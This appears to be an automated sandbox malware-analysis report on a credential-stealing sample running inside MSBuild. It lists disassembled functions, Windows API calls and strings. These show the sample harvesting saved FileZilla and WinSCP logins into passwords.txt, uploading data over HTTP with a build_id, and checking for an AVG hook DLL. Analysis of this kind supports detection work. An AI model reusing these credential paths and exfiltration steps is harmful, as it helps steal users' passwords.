Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction ID: 61d95923a291ecda6e095beb314f014951f64f3de92a0ce4f4bd39d2e0bf5c47
Opcode Fuzzy Hash: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction Fuzzy Hash: F2F0E071A0132467EB04DFB4EC49B9B37659B04725F100295F511D71D0EB759E844785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction ID: 6ece5ee49d11cdb060b7bdfc3a79890b10628a8e35908506f9dd9848dd200c5c
Opcode Fuzzy Hash: 998f64295720f10c821e057b3243b12a1334f63cbf789cdccd19e786a3f5f674
Instruction Fuzzy Hash: 63E092B1D1020DABCF04DF60EC459DE77FCEB08308F0054B5A505E3180D674AB888F44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418654), ref: 004014DF

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: RtlAllocateHeap.NTDLL(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,4b1193935308da1162176c44b42898a6,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 0040589D
", xrefs: 0040581B
------, xrefs: 0040573C
", xrefs: 00405AD8
file_data, xrefs: 00405C09
", xrefs: 00405C35
------, xrefs: 00405605
--, xrefs: 00405600
ERROR, xrefs: 00405F2F
build_id, xrefs: 0040594F
------, xrefs: 004059FF
4b1193935308da1162176c44b42898a6, xrefs: 004059A7
ERROR, xrefs: 00405D79
block, xrefs: 00405E30
------, xrefs: 00405B5D
", xrefs: 0040597B

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$OpenRequestlstrcat$AllocAllocateBinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$4b1193935308da1162176c44b42898a6$ERROR$ERROR$block$build_id$file_data
API String ID: 215681420-1372881062
Opcode ID: bd7b3a35313f5fad876365d979ecd5ebe524cc33e54e34361747f9aab05fea23
Instruction ID: 4baf88cb2a5c47609fe6293a48fe3edcdf17a13d7b96339157f3ca2814525fa3
Opcode Fuzzy Hash: bd7b3a35313f5fad876365d979ecd5ebe524cc33e54e34361747f9aab05fea23
Instruction Fuzzy Hash: 8F42E671D401699BDF21FB21DC45ADDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

<Pass encoding="base64">, xrefs: 0040E88A
Login: , xrefs: 0040E98C
passwords.txt, xrefs: 0040EA4D
Password: , xrefs: 0040E9AE
<User>, xrefs: 0040E851
Host: , xrefs: 0040E954
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
<Port>, xrefs: 0040E818
Soft: FileZilla, xrefs: 0040E948
<Host>, xrefs: 0040E7D9

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 615d63f7bf2d45f6f47d8fedcf3be5491d61456915c6e85213d9bd40bf3d1580
Instruction ID: 14048a2b419fde31a88832429adc402d622cfb8f20e2d9bcd7eb6ceae992149e
Opcode Fuzzy Hash: 615d63f7bf2d45f6f47d8fedcf3be5491d61456915c6e85213d9bd40bf3d1580
Instruction Fuzzy Hash: E5A18572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Host: , xrefs: 0040E32A
PortNumber, xrefs: 0040E3BD
Password, xrefs: 0040E515
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
passwords.txt, xrefs: 0040E662
:22, xrefs: 0040E42D
Login: , xrefs: 0040E459
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Security, xrefs: 0040E253
HostName, xrefs: 0040E367
UseMasterPassword, xrefs: 0040E24E
Soft: WinSCP, xrefs: 0040E2FE
Password: , xrefs: 0040E529
UserName, xrefs: 0040E496

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction ID: ab712d79911a6534e16ca2c8d51643d97c9570b95301d2e418567ee179d90524
Opcode Fuzzy Hash: 4eaab8354fff006c774e5a3a11a8fc4062ced311967a4d7608afb3132e7bbd75
Instruction Fuzzy Hash: 56D1D6B195012DAADF21EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,4b1193935308da1162176c44b42898a6,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406080
", xrefs: 00406445
", xrefs: 004062E5
", xrefs: 004065A1
------, xrefs: 00406206
------, xrefs: 00406367
4b1193935308da1162176c44b42898a6, xrefs: 00406471
mode, xrefs: 00406575
------, xrefs: 004064C9
build_id, xrefs: 00406419

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$4b1193935308da1162176c44b42898a6$build_id$mode
API String ID: 3702379033-1293445384
Opcode ID: 9a88e138862845f63bc5902172524daa52c3179df56ce96312ed2febdce6b6a2
Instruction ID: 761880eafc7f1130453e9609930188909abd0ac3e1dc834df3bf91bb01064538
Opcode Fuzzy Hash: 9a88e138862845f63bc5902172524daa52c3179df56ce96312ed2febdce6b6a2
Instruction Fuzzy Hash: 9E22C9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 00418753 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418794
GetProcAddress.KERNEL32 ref: 004187AB
GetProcAddress.KERNEL32 ref: 004187C2
GetProcAddress.KERNEL32 ref: 004187D9
GetProcAddress.KERNEL32 ref: 004187F0
GetProcAddress.KERNEL32 ref: 00418807
GetProcAddress.KERNEL32 ref: 0041881E
GetProcAddress.KERNEL32 ref: 00418835
GetProcAddress.KERNEL32 ref: 0041884C
GetProcAddress.KERNEL32 ref: 00418863
GetProcAddress.KERNEL32 ref: 0041887A
GetProcAddress.KERNEL32 ref: 00418891
GetProcAddress.KERNEL32 ref: 004188A8
GetProcAddress.KERNEL32 ref: 004188BF
GetProcAddress.KERNEL32 ref: 004188D6
GetProcAddress.KERNEL32 ref: 004188ED
GetProcAddress.KERNEL32 ref: 00418904
GetProcAddress.KERNEL32 ref: 0041891B
